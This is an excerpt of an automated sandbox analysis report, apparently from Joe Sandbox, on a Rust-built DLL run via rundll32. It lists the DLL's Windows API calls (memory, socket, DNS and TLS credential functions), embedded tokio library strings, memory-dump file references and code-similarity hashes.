                        • memmove.VCRUNTIME140(?,?,00000098), ref: 6CBBA1B6
                        • memmove.VCRUNTIME140(?,?,00000098), ref: 6CBBA1C8
                        • memmove.VCRUNTIME140(?,?,00000098), ref: 6CBBA1F4
                        • memmove.VCRUNTIME140(?,?,00000098), ref: 6CBBA251
                        Strings
                        • future polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-native-tls-0.3.1\src\lib.rs, xrefs: 6CBBA27D, 6CBBA299
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: future polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-native-tls-0.3.1\src\lib.rs
                        • API String ID: 2162964266-1242699868
                        • Opcode ID: 4b2c80b1e523bd3780b569981c7f79ec01f41ee7931e7c71b16e16e3fd179533
                        • Instruction ID: b6823977e30a580c1e7b66d7bb0ee91316cca450b524c326b13281b0aedae0c5
                        • Opcode Fuzzy Hash: 4b2c80b1e523bd3780b569981c7f79ec01f41ee7931e7c71b16e16e3fd179533
                        • Instruction Fuzzy Hash: 4D927D759087819FC761CF24C48079BBBF5FF99314F04896EE8889B741EB70A949CB92
                        APIs
                        • memmove.VCRUNTIME140(?,?,00000098), ref: 6CBB49AB
                        • memmove.VCRUNTIME140(?,?,00000148), ref: 6CBB49DF
                        • memmove.VCRUNTIME140(?,?,00000148), ref: 6CBB49F7
                        • memmove.VCRUNTIME140(?,?,00000098), ref: 6CBB4A3A
                        • memmove.VCRUNTIME140(?,?,00000188), ref: 6CBB4A7C
                        • memmove.VCRUNTIME140(?,?,00000029), ref: 6CBB4C4B
                        • memmove.VCRUNTIME140(?,?,00000029), ref: 6CBB4D08
                        • memmove.VCRUNTIME140(?,?,00000029), ref: 6CBB4D40
                        • memmove.VCRUNTIME140(?,?,000000D0), ref: 6CBB4DC4
                        • memmove.VCRUNTIME140(?,?,000000D4), ref: 6CBB4DDB
                        • memmove.VCRUNTIME140(?,?,000000D4), ref: 6CBB4E62
                        • memmove.VCRUNTIME140(?,?,00000114), ref: 6CBB4F5D
                        • memmove.VCRUNTIME140(?,?,00000114), ref: 6CBB502A
                        • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CBB5052
                        • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CBB5104
                        • memmove.VCRUNTIME140(?,00000009,00000118), ref: 6CBB534C
                        • memmove.VCRUNTIME140(?,00000009,00000118), ref: 6CBB5381
                        • memmove.VCRUNTIME140(?,00000009,00000118), ref: 6CBB5832
                        • memmove.VCRUNTIME140(?,?,00000118), ref: 6CBB5EB4
                        • memmove.VCRUNTIME140(?,?,0000011C), ref: 6CBB5ED2
                        • memmove.VCRUNTIME140(0000002C,?,0000011C), ref: 6CBB5F29
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: U9W{$cannot poll Select twice
                        • API String ID: 2162964266-2385121630
                        • Opcode ID: 80ab3cce598cc3dc1e1d92a921787912c9f6c794e8b72483dbc99b8e3f910cbc
                        • Instruction ID: ca4f25a14a12bbaf299b0dcae1ccf76e56c7cbfdd61041255f6ee14cae632c22
                        • Opcode Fuzzy Hash: 80ab3cce598cc3dc1e1d92a921787912c9f6c794e8b72483dbc99b8e3f910cbc
                        • Instruction Fuzzy Hash: 4C32A275908B858FC722CF24C8807EBB7F5BF9A345F044A6DD8896F242DB709549CB92
                        APIs
                        • memmove.VCRUNTIME140(?,?,00000098), ref: 6CBB4A3A
                        • memmove.VCRUNTIME140(?,?,00000188), ref: 6CBB4A7C
                        • memmove.VCRUNTIME140(?,?,00000029), ref: 6CBB4C4B
                        • memmove.VCRUNTIME140(?,?,00000029), ref: 6CBB4D08
                        • memmove.VCRUNTIME140(?,?,00000029), ref: 6CBB4D40
                        • memmove.VCRUNTIME140(?,?,000000D0), ref: 6CBB4DC4
                        • memmove.VCRUNTIME140(?,?,000000D4), ref: 6CBB4DDB
                        • memmove.VCRUNTIME140(?,?,000000D4), ref: 6CBB4E62
                        • memmove.VCRUNTIME140(?,?,00000114), ref: 6CBB4F5D
                        • memmove.VCRUNTIME140(?,?,00000114), ref: 6CBB502A
                        • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CBB5052
                        • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CBB5104
                        • memmove.VCRUNTIME140(?,00000009,00000118), ref: 6CBB534C
                        • memmove.VCRUNTIME140(?,00000009,00000118), ref: 6CBB5381
                        • memmove.VCRUNTIME140(?,00000009,00000118), ref: 6CBB5832
                        • memmove.VCRUNTIME140(?,?,00000118), ref: 6CBB5EB4
                        • memmove.VCRUNTIME140(?,?,0000011C), ref: 6CBB5ED2
                        • memmove.VCRUNTIME140(0000002C,?,0000011C), ref: 6CBB5F29
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: U9W{
                        • API String ID: 2162964266-3288374708
                        • Opcode ID: c1b5f42339f17ccabbadab48d9d62e9079f2794efa4c0e5de8875e3f3f4505da
                        • Instruction ID: 1ef5fe66be87208b4a56a99f74c1da53618de4e0fb0bbe3d9b46d0e214e68559
                        • Opcode Fuzzy Hash: c1b5f42339f17ccabbadab48d9d62e9079f2794efa4c0e5de8875e3f3f4505da
                        • Instruction Fuzzy Hash: 6E227F75908B858FC722CF24C4807EBB7F5BF9A345F044A6DD8896F242DB709589CB92
                        APIs
                        • WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000081), ref: 6CB8B6BC
                        • ioctlsocket.WS2_32(?,8004667E,?), ref: 6CB8B6DA
                        • GetLastError.KERNEL32 ref: 6CB8B6F0
                        • GetLastError.KERNEL32 ref: 6CB8B736
                        • WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 6CB8B83F
                        • GetLastError.KERNEL32 ref: 6CB8B84A
                        • closesocket.WS2_32(?), ref: 6CB8B9F0
                          • Part of subcall function 6CBE7A4F: setsockopt.WS2_32(?,0000FFFF,?,?,00000004), ref: 6CBE7A63
                        Strings
                        • tcp open errortcp set_nonblocking errortcp bind local error, xrefs: 6CB8B6F9
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: ErrorLast$IoctlSocketclosesocketioctlsocketsetsockopt
                        • String ID: tcp open errortcp set_nonblocking errortcp bind local error
                        • API String ID: 2822801258-1475804424
                        • Opcode ID: 13de363c49f1a6a2398dfa14a899dcc3e5d43fa880c506de524aad006cbb5679
                        • Instruction ID: 94785657927cb3e89d69f909e8c84a7cc64c462e95f2286529af56bf48362934
                        • Opcode Fuzzy Hash: 13de363c49f1a6a2398dfa14a899dcc3e5d43fa880c506de524aad006cbb5679
                        • Instruction Fuzzy Hash: 95E1BF716097819FE714CF24C880B5ABBF1FF89714F10891DF9989B691D7B1D885CB82
                        APIs
                        • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 6CBE6BC7
                        • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 6CBE6BDB
                        • memset.VCRUNTIME140(?,00000000,00000110,00000000,RtlGetVersion), ref: 6CBE6BF9
                        • AcquireCredentialsHandleA.SECUR32(00000000,Microsoft Unified Security Protocol Provider,00000002,00000000,?,00000000,00000000,?,00000000), ref: 6CBE6CA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: Handle$AcquireAddressCredentialsModuleProcmemset
                        • String ID: Microsoft Unified Security Protocol Provider$RtlGetVersion$bE$ntdll.dll
                        • API String ID: 166702113-1116218560
                        • Opcode ID: 7d53d3c7a58b3229d16c64ba4ae252c1d531c1d12de8e7fcc51a8be28d7d39c3
                        • Instruction ID: 2e0e865947cfa7ac0421eba6db2c3105cfd716f372c0895320e7fcc44207324d
                        • Opcode Fuzzy Hash: 7d53d3c7a58b3229d16c64ba4ae252c1d531c1d12de8e7fcc51a8be28d7d39c3
                        • Instruction Fuzzy Hash: 8A718B71A087899BD324CF25C840B6AB7F4FFC9754F108A1DE6988B641EB71E485CB52
                        APIs
                        • memmove.VCRUNTIME140(?,?,00000029), ref: 6CBB4C4B
                        • memmove.VCRUNTIME140(?,?,00000029), ref: 6CBB4D08
                        • memmove.VCRUNTIME140(?,?,00000029), ref: 6CBB4D40
                        • memmove.VCRUNTIME140(?,?,000000D0), ref: 6CBB4DC4
                        • memmove.VCRUNTIME140(?,?,000000D4), ref: 6CBB4DDB
                        • memmove.VCRUNTIME140(?,?,000000D4), ref: 6CBB4E62
                        • memmove.VCRUNTIME140(?,?,00000114), ref: 6CBB4F5D
                        • memmove.VCRUNTIME140(?,?,00000114), ref: 6CBB502A
                        • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CBB5052
                        • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CBB5104
                        • memmove.VCRUNTIME140(?,00000009,00000118), ref: 6CBB534C
                        • memmove.VCRUNTIME140(?,00000009,00000118), ref: 6CBB5381
                        • memmove.VCRUNTIME140(?,00000009,00000118), ref: 6CBB5832
                        • memmove.VCRUNTIME140(?,?,00000118), ref: 6CBB5EB4
                        • memmove.VCRUNTIME140(?,?,0000011C), ref: 6CBB5ED2
                        • memmove.VCRUNTIME140(0000002C,?,0000011C), ref: 6CBB5F29
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: U9W{
                        • API String ID: 2162964266-3288374708
                        • Opcode ID: eb385e3b0bfad762258cf0ffa40adf1d73f1c0237be04e3938bf0d297f998a7b
                        • Instruction ID: 025bc14e440475475fa85b08436258d19e8b7531609f7c46b8b4f4e36c2814c2
                        • Opcode Fuzzy Hash: eb385e3b0bfad762258cf0ffa40adf1d73f1c0237be04e3938bf0d297f998a7b
                        • Instruction Fuzzy Hash: D4128E75908B858FC722CF24C4907EBB7F5BF9A341F044A6DD8896F242DB709589CB92
                        APIs
                        • memmove.VCRUNTIME140(?,?,00000110,?,?,6CC55F8C,6CC55F64), ref: 6CBA2202
                        • memmove.VCRUNTIME140(?,?,00000110,?,?,?,?,?,6CC55F8C,6CC55F64), ref: 6CBA222D
                        Strings
                        • dns error, xrefs: 6CBA154C
                        • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CBA20E0
                        • invalid URL, scheme is not httpinvalid URL, scheme is missinginvalid URL, host is missingConnectError, xrefs: 6CBA11EC
                        • cannot poll Select twice, xrefs: 6CBA20FC
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: cannot poll Select twice$dns error$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs$invalid URL, scheme is not httpinvalid URL, scheme is missinginvalid URL, host is missingConnectError
                        • API String ID: 2162964266-100685727
                        • Opcode ID: 42ccd4cc4323f8ed151906f05554a93a0e6a801a3a30f195caa6d66727937638
                        • Instruction ID: 55ba7bf5d2d9148db520a1cf9537feb51249e2be572aa1dd95c8485acd50ba83
                        • Opcode Fuzzy Hash: 42ccd4cc4323f8ed151906f05554a93a0e6a801a3a30f195caa6d66727937638
                        • Instruction Fuzzy Hash: 9CB25B71908B84CBC765CF24C48079AB7F1FF8A354F148A1EE8DD9B651DB70A986CB42
                        APIs
                        Strings
                        • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 6CB87E79
                        • assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 6CB87E8B
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: ErrorLast$getpeernamegetsockname
                        • String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
                        • API String ID: 1444953621-3544120690
                        • Opcode ID: cf2daeac4fb4dedaf16ec85fea5cf11f6bc8b5077e7eb10a6da9a41f3449a165
                        • Instruction ID: 9406dcc33c9091eb054cfe31bd86a7b78835e17bffa23cf747bdb95f53003ad5
                        • Opcode Fuzzy Hash: cf2daeac4fb4dedaf16ec85fea5cf11f6bc8b5077e7eb10a6da9a41f3449a165
                        • Instruction Fuzzy Hash: 3EA16B30908B80DAD315CF28C4416ABB7F4FFCA359F009A0DF8D99B651E7B58985CB52
                        APIs
                        • __aulldiv.LIBCMT ref: 6CB8B5A6
                        • __aulldiv.LIBCMT ref: 6CB8B5E8
                        • WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000081), ref: 6CB8B6BC
                        • ioctlsocket.WS2_32(?,8004667E,?), ref: 6CB8B6DA
                        • closesocket.WS2_32(?), ref: 6CB8B9F0
                        Strings
                        • tcp set_nonblocking errortcp bind local error, xrefs: 6CB8B750
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: __aulldiv$Socketclosesocketioctlsocket
                        • String ID: tcp set_nonblocking errortcp bind local error
                        • API String ID: 2345199343-2725198832
                        • Opcode ID: 635b2c74a7e15896fd61357be630d267c1ce4db3533f5be9dd171efeeed2b544
                        • Instruction ID: 037f21fdc84699899d65cbf1c0b1d77ab448e07297793df9240dc5446556cb77
                        • Opcode Fuzzy Hash: 635b2c74a7e15896fd61357be630d267c1ce4db3533f5be9dd171efeeed2b544
                        • Instruction Fuzzy Hash: EA5121303047419BD704CF28CC80B6AB7F6EF89364F108A2DF5598B281E771E845CB92
                        APIs
                          • Part of subcall function 6CB958F1: memmove.VCRUNTIME140(?,00000000,00000000,00000000,00000000,?,00000020,?,6CBCF033,stream closed because of a broken pipesend_close: unexpected state ,00000026), ref: 6CB95916
                        • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 6CBF84BE
                        • WSAGetLastError.WS2_32(?,00000004,?,?,00000002,6CBA288D,?,?,6CC55F8C,6CC55F64), ref: 6CBF84CB
                        Strings
                        • called `Result::unwrap()` on an `Err` value, xrefs: 6CBF83C2, 6CBF847D
                        • A Tokio 1.x context was found, but it is being shutdown.the timer is shutdown, must be called from the context of Tokio runtimetimer is at capacity and cannot create a new entrytimer duration exceeds maximum durationdeadline has elapsedD:\rust\cargo\registry\s, xrefs: 6CBF7F5F
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: ErrorLastmemmovesetsockopt
                        • String ID: A Tokio 1.x context was found, but it is being shutdown.the timer is shutdown, must be called from the context of Tokio runtimetimer is at capacity and cannot create a new entrytimer duration exceeds maximum durationdeadline has elapsedD:\rust\cargo\registry\s$called `Result::unwrap()` on an `Err` value
                        • API String ID: 1441254279-3286110522
                        • Opcode ID: e7da4a64145b5b7a9c03a4049d651e7e3fd7ee313b135607fc34dfdb3542c1b9
                        • Instruction ID: 78b735d0588ee5a33b02bb0b6020872ba45cb66ecee11befc57e945525ef773c
                        • Opcode Fuzzy Hash: e7da4a64145b5b7a9c03a4049d651e7e3fd7ee313b135607fc34dfdb3542c1b9
                        • Instruction Fuzzy Hash: C602AD706087818FD314CF26C49075EB7E1FF8A308F10896EE9A98B791DB75D94ACB42
                        APIs
                        • memmove.VCRUNTIME140(?,?,00000158), ref: 6CBB00B6
                        • memmove.VCRUNTIME140(?,?,00000158), ref: 6CBB00D9
                        • memmove.VCRUNTIME140(?,?,00000158), ref: 6CBB0198
                        • memmove.VCRUNTIME140(?,?,000001B0), ref: 6CBB01BB
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID:
                        • API String ID: 2162964266-0
                        • Opcode ID: cb6fd49eca36c3565897ae622bdf1d7e77949181de46ae8a1c66ffb61f68c813
                        • Instruction ID: 373b44f010373a988611ba712d717807e5a1afeffa222d91f675450a81f5461e
                        • Opcode Fuzzy Hash: cb6fd49eca36c3565897ae622bdf1d7e77949181de46ae8a1c66ffb61f68c813
                        • Instruction Fuzzy Hash: 8A51227164C7C49FCB018B64D850AFEBBE5AF96348F088859E8D95B740DB71D80DC792
                        APIs
                          • Part of subcall function 6CB8B679: WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000081), ref: 6CB8B6BC
                          • Part of subcall function 6CB8B679: ioctlsocket.WS2_32(?,8004667E,?), ref: 6CB8B6DA
                          • Part of subcall function 6CB8B679: closesocket.WS2_32(?), ref: 6CB8B9F0
                        • memmove.VCRUNTIME140(?,?,00000110,?,?,6CC55F8C,6CC55F64), ref: 6CBA2202
                        • memmove.VCRUNTIME140(?,?,00000110,?,?,?,?,?,6CC55F8C,6CC55F64), ref: 6CBA222D
                        Strings
                        • cannot poll Select twice, xrefs: 6CBA20FC
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove$Socketclosesocketioctlsocket
                        • String ID: cannot poll Select twice
                        • API String ID: 3048605929-3773267893
                        • Opcode ID: 02e5995f937937e151564e8a9cd7846ad571b4d74334e2ab9d4c2fb6fee64fcb
                        • Instruction ID: 21c26a7f54e0720ba616dc8b0da677bba62e166e3978a06f3002c5438cdf25e9
                        • Opcode Fuzzy Hash: 02e5995f937937e151564e8a9cd7846ad571b4d74334e2ab9d4c2fb6fee64fcb
                        • Instruction Fuzzy Hash: 9641EF31908B84CBC711CF64C4409ABB7B1FF9A344F148A5DE88D1F611EB31E496CB92
                        APIs
                        • memmove.VCRUNTIME140(?,?,?), ref: 6CBEF485
                        • getaddrinfo.WS2_32(?,00000000,?,?), ref: 6CBEF4F0
                        • WSAGetLastError.WS2_32 ref: 6CBEF4FD
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: ErrorLastgetaddrinfomemmove
                        • String ID:
                        • API String ID: 1338285005-0
                        • Opcode ID: 4a668e5c7b9f1eca961b3f85f2573e20e4857cb319f4875bb263b485c77e56e7
                        • Instruction ID: 947d51746a6664da5c99f0a3469e953580bbe42660df41f49c897039e3dd47b9
                        • Opcode Fuzzy Hash: 4a668e5c7b9f1eca961b3f85f2573e20e4857cb319f4875bb263b485c77e56e7
                        • Instruction Fuzzy Hash: 81318CB0E003499BDB00CF95E880BEEBBF4EF59744F148529E849A7740E775E985CBA1
                        APIs
                        • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,00000004,000000FF), ref: 6CC049D7
                        • GetLastError.KERNEL32 ref: 6CC049DE
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: AddressErrorLastWait
                        • String ID:
                        • API String ID: 1574541344-0
                        • Opcode ID: bcefdb81217383e381ed6f8fdcc1c0d1748bf503053b50d5d7a4eb70811f426c
                        • Instruction ID: 9c5517df8c9bb2b83c69f5ef86b805bbaed12c6ad18d6561917fa7be770089b0
                        • Opcode Fuzzy Hash: bcefdb81217383e381ed6f8fdcc1c0d1748bf503053b50d5d7a4eb70811f426c
                        • Instruction Fuzzy Hash: AA21DD75B41A198FDF05CF59C8817AE7BB5FB96318F204138E502ABB40E73A9882CB54
                        APIs
                        • RtlReAllocateHeap.NTDLL(00000000,?,6CBE8F66,?,?,?,?,?,6CBE8F66,?,?,?,?,?), ref: 6CB65B0E
                        • memmove.VCRUNTIME140(00000000,?,6CBE8F66,?,?,?,?,?,6CBE8F66,?,?,?,?,?), ref: 6CB65B44
                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,6CBE8D0C,?,?,?,00000077), ref: 6CB65B57
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: Heap$AllocateFreememmove
                        • String ID:
                        • API String ID: 94897913-0
                        • Opcode ID: 8cf92e260ffb5082659e0f3015bfa5c46838e68467b248860d440b91bc96f791
                        • Instruction ID: 9e64a3a9ef20c8eba7f64b61c394015a0e428f59bd7f27835712b6de57a89aaf
                        • Opcode Fuzzy Hash: 8cf92e260ffb5082659e0f3015bfa5c46838e68467b248860d440b91bc96f791
                        • Instruction Fuzzy Hash: A60126717042049FDB159F76DC84E6FBFB9EB86298F054038F94AC3602E732545ACA62
                        APIs
                        Memory Dump Source
